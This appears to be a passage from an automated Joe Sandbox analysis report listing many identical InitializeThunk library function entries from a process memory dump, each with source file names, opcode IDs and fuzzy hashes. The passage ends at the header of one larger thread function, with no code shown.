                                                      Function 03744340 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 4d48d359cca14b761aa8a313c0d4b30e4099f5ce6bf7c6f95b1e2c2457c0d4a1
                                                      • Instruction ID: 1b79f5e2aa4953fd8bf6e7ae066b1a2626997d7e11f476d25ea49d14c7e7f42d
                                                      • Opcode Fuzzy Hash: 4d48d359cca14b761aa8a313c0d4b30e4099f5ce6bf7c6f95b1e2c2457c0d4a1
                                                      • Instruction Fuzzy Hash: 8890023170580423A144B15848C4546400597E0301B55C021F4424564C8B548A565762
                                                      Function 03744650 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 665e29e65c64cf3f0104bd6cd537cde27c02de8bb1750c63ee5c34156ed91778
                                                      • Instruction ID: 4469632f491d627de23bc249e1bc536b63e926860d869bede31f9c029e97a181
                                                      • Opcode Fuzzy Hash: 665e29e65c64cf3f0104bd6cd537cde27c02de8bb1750c63ee5c34156ed91778
                                                      • Instruction Fuzzy Hash: 36900471701504535144F15C4C444077005D7F13013D5C135F4554570CC75CCD55D77F
                                                      Function 03742B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: ed209c407c0d143e07251063299daad6c7540abea7eb7ace42cdae3d45e25250
                                                      • Instruction ID: 60ea888740c0ac132ac7585716b504dcb066e72d5ee185392eb3da3fdd0c569e
                                                      • Opcode Fuzzy Hash: ed209c407c0d143e07251063299daad6c7540abea7eb7ace42cdae3d45e25250
                                                      • Instruction Fuzzy Hash: A5900261302404135109B1584454616400A87E0201B55C031F50145A0DC66589916526
                                                      Function 03742BF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 609913ef5e641a4f7096b23b4d45594655962d2b668254cee6ffcfeaeef1b9be
                                                      • Instruction ID: e7ac824455472fcb2648fd65a0fc5cf09163cbc8742c1dd69a88660906729898
                                                      • Opcode Fuzzy Hash: 609913ef5e641a4f7096b23b4d45594655962d2b668254cee6ffcfeaeef1b9be
                                                      • Instruction Fuzzy Hash: 9490023130140C13E184B158444464A000587D1301F95C025B4025664DCB558B597BA2
                                                      Function 03742BE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: e2db9ff1351b97bf1192e06c27ea7e5b651fb764d67acfe24f3002162103ae03
                                                      • Instruction ID: 367b578c83d11ff82864731835a43d7ac316ebaece229524dd0fbf62885007f6
                                                      • Opcode Fuzzy Hash: e2db9ff1351b97bf1192e06c27ea7e5b651fb764d67acfe24f3002162103ae03
                                                      • Instruction Fuzzy Hash: 0290023130544C53E144B1584444A46001587D0305F55C021B40646A4D97658E55BA62
                                                      Function 03742BA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: b20d91b5f279d287a11307c263391ddc6ba6bb4dfff54e2ca9a299d5268c051c
                                                      • Instruction ID: f9e7849ed393ff34608249ed0898b727af17facac6e8e6eecf79aae3df960e9a
                                                      • Opcode Fuzzy Hash: b20d91b5f279d287a11307c263391ddc6ba6bb4dfff54e2ca9a299d5268c051c
                                                      • Instruction Fuzzy Hash: CC90023170540C13E154B1584454746000587D0301F55C021B4024664D87958B557AA2
                                                      Function 03742AF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 32388ad307a144ada0fb12518a1c3f42af6953f95cf212101709a36158adc984
                                                      • Instruction ID: f88a32e1e05be0b344048598a3dcdc439c1a8eb45f29f5f71f1aa1933d3792d4
                                                      • Opcode Fuzzy Hash: 32388ad307a144ada0fb12518a1c3f42af6953f95cf212101709a36158adc984
                                                      • Instruction Fuzzy Hash: 76900225321404131149F558064450B044597D6351395C025F54165A0CC76189655722
                                                      Function 03742AD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 2efd2da6243a2918c448cf082f634dcd63a114a39f58a8feba003e3f0c55eecb
                                                      • Instruction ID: 2cccec519a5300d7a3fe56dec07a4c4f11266dd4e83636c411b1e04f20706f31
                                                      • Opcode Fuzzy Hash: 2efd2da6243a2918c448cf082f634dcd63a114a39f58a8feba003e3f0c55eecb
                                                      • Instruction Fuzzy Hash: 5090043531140413110DF55C07445070047C7D5351355C031F5015570CD771CD715533
                                                      Function 03742F30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: e79a1d93dce3cc4509f589ccc7c0d270e4eb73e99cca77ca4d753fb195b12ef9
                                                      • Instruction ID: 0a7109f5c6885c6e94475ce2dd10386ae8ca9bd18bfe56b73ced346a65d945e6
                                                      • Opcode Fuzzy Hash: e79a1d93dce3cc4509f589ccc7c0d270e4eb73e99cca77ca4d753fb195b12ef9
                                                      • Instruction Fuzzy Hash: 9990026134140853E104B1584454B060005C7E1301F55C025F5064564D8759CD526527
                                                      Function 03742FE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 4ef8c22b364c6ce88b45917ada709c7726bf03a76c881fc0b8f52755abe38588
                                                      • Instruction ID: ed17ef8d114a2ac682b2e8bb2cbd86bf244081fdc839d4d671c31df45b2dd39f
                                                      • Opcode Fuzzy Hash: 4ef8c22b364c6ce88b45917ada709c7726bf03a76c881fc0b8f52755abe38588
                                                      • Instruction Fuzzy Hash: 46900221311C0453E204B5684C54B07000587D0303F55C125B4154564CCA5589615922
                                                      Function 03742FB0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 0c38fd1391ad418495a503be88d4cf5325eca80dd14b17ee3268d155653b6ea8
                                                      • Instruction ID: 82de35a5688ade436deda1f024ed346640533ba554669716afbf811f2549769c
                                                      • Opcode Fuzzy Hash: 0c38fd1391ad418495a503be88d4cf5325eca80dd14b17ee3268d155653b6ea8
                                                      • Instruction Fuzzy Hash: B2900221701404535144B16888849064005ABE1211755C131B4998560D869989655A66
                                                      Function 03742EE0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 33775dbaa9b1fddb1abb903cb5cc80f9084cfd74be5183775174d911811a6139
                                                      • Instruction ID: e4f3269c9882d05c0dca1a84e1d64d39a9e3befa5e4e3f058ffb13e8f4bccd94
                                                      • Opcode Fuzzy Hash: 33775dbaa9b1fddb1abb903cb5cc80f9084cfd74be5183775174d911811a6139
                                                      • Instruction Fuzzy Hash: 7590026130180813E144B5584844607000587D0302F55C021B6064565E8B698D516536
                                                      Function 03742E80 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 8193b887bffc8974b3bbc99d6baa727f4842913952573479bc7d1ea76d0114ae
                                                      • Instruction ID: ee5ad104a3aa877696cae179d13bed022153492570b4bf0934a6ac22913c6d60
                                                      • Opcode Fuzzy Hash: 8193b887bffc8974b3bbc99d6baa727f4842913952573479bc7d1ea76d0114ae
                                                      • Instruction Fuzzy Hash: 1690022170140913E105B1584444616000A87D0241F95C032B5024565ECB658A92A532
                                                      Function 03742D30 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: df1f7c3a7bd84d15e3f03e5f0aedd9f6412d1dc776c5311fea1fc7e0c9ab7fcf
                                                      • Instruction ID: 2caebc2c5e2e7a29464fc21f0570ce1a481762950574945a7b495fa3279c2172
                                                      • Opcode Fuzzy Hash: df1f7c3a7bd84d15e3f03e5f0aedd9f6412d1dc776c5311fea1fc7e0c9ab7fcf
                                                      • Instruction Fuzzy Hash: 9690022130140413E144B15854586064005D7E1301F55D021F4414564CDA5589565623
                                                      Function 03742D10 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: b01dcf9b9bf621418dc5fe1e072eba037e2e1deae6e98458a1a0c18f44c3be3f
                                                      • Instruction ID: 8249bce200c229e3c21f4b4e2b59b83fda8b93b60cc59ed1513ff051e22c04ad
                                                      • Opcode Fuzzy Hash: b01dcf9b9bf621418dc5fe1e072eba037e2e1deae6e98458a1a0c18f44c3be3f
                                                      • Instruction Fuzzy Hash: 6A90022931340413E184B158544860A000587D1202F95D425B4015568CCA5589695722
                                                      Function 03742DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 2cb3757be789e9fd6db6a9edde48e178bf17146ae62d60c5d9bc3ad8fe9bef20
                                                      • Instruction ID: f8265ad31c03cba8f65e491222151c8f3cfc692df3e59a3823f5787e2a00a8f4
                                                      • Opcode Fuzzy Hash: 2cb3757be789e9fd6db6a9edde48e178bf17146ae62d60c5d9bc3ad8fe9bef20
                                                      • Instruction Fuzzy Hash: 2990023130140823E115B1584544707000987D0241F95C422B4424568D97968A52A522
                                                      Function 03742DD0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 8f6c214c9d5ab2a504eaebe5c77b83508531dc150419db1fae236da2577b5d69
                                                      • Instruction ID: 644b5c1b9306302118310ae73866ff0136e1d69226ac8c629e995e30738597f1
                                                      • Opcode Fuzzy Hash: 8f6c214c9d5ab2a504eaebe5c77b83508531dc150419db1fae236da2577b5d69
                                                      • Instruction Fuzzy Hash: 25900221342445636549F1584444507400697E0241795C022B5414960C86669956DA22
                                                      Function 03742C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: bc9cc39abed6bf4311022f7f2e964720848a8f5fe1378d3360ded98dd842524e
                                                      • Instruction ID: 463c3bbfd9a1db0fe93e34029c9ba3167f41ebdbfd7957ee8432fb00afd5b7f0
                                                      • Opcode Fuzzy Hash: bc9cc39abed6bf4311022f7f2e964720848a8f5fe1378d3360ded98dd842524e
                                                      • Instruction Fuzzy Hash: DB90023130148C13E114B158844474A000587D0301F59C421B8424668D87D589917522
                                                      Function 03742C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 05b5f12371882245613a980449bbc25aed4d8f3ae25a34037b9aad100e081335
                                                      • Instruction ID: 0adfa6b7e9b9016ae5168c586607f8fc232c314d2d2e3d131db158e7f2ddcbad
                                                      • Opcode Fuzzy Hash: 05b5f12371882245613a980449bbc25aed4d8f3ae25a34037b9aad100e081335
                                                      • Instruction Fuzzy Hash: 5D90023130140C53E104B1584444B46000587E0301F55C026B4124664D8755C9517922
                                                      Function 03742CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: cb87cc024702eb7c533c63314af515885b0542d4e15c2ecd0450a10fe2725023
                                                      • Instruction ID: 23fe22ae9ff1a5d4d9e4013e66e1e6e2d49ddafb0204a2a39cb98f7562ffe00b
                                                      • Opcode Fuzzy Hash: cb87cc024702eb7c533c63314af515885b0542d4e15c2ecd0450a10fe2725023
                                                      • Instruction Fuzzy Hash: 1490023130140813E104B5985448646000587E0301F55D021B9024565EC7A589916532
                                                      Function 037435C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 6f6479937f5bcad5edf79d6e4c4b6132c4b00139394cf0c0ac16e4fe8f0d6a79
                                                      • Instruction ID: 484ffaed10dbcd0a8197fbd43116bbe1b5a7c3d0d40d5f74f88bd4d08c899746
                                                      • Opcode Fuzzy Hash: 6f6479937f5bcad5edf79d6e4c4b6132c4b00139394cf0c0ac16e4fe8f0d6a79
                                                      • Instruction Fuzzy Hash: 4790023170550813E104B1584554706100587D0201F65C421B4424578D87D58A5169A3
                                                      Function 037439B0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000C.00000002.4562226011.00000000036D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                      • Associated: 0000000C.00000002.4562226011.00000000037F9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.00000000037FD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      • Associated: 0000000C.00000002.4562226011.000000000386E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_12_2_36d0000_compact.jbxd
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: e71c7305a86aa1e0622af269822eda600545c027df9c3d475da7d9c72bb44788
                                                      • Instruction ID: 34628bb92eb928a2e42be9a1f1ab94300b3b25c251cfa45614fbf3be7569ac5e
                                                      • Opcode Fuzzy Hash: e71c7305a86aa1e0622af269822eda600545c027df9c3d475da7d9c72bb44788
                                                      • Instruction Fuzzy Hash: 8F90022134545513E154B15C44446164005A7E0201F55C031B48145A4D869589556622
                                                      Function 02DC9688 Relevance: 75.4, APIs: 1, Strings: 42, Instructions: 187threadCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
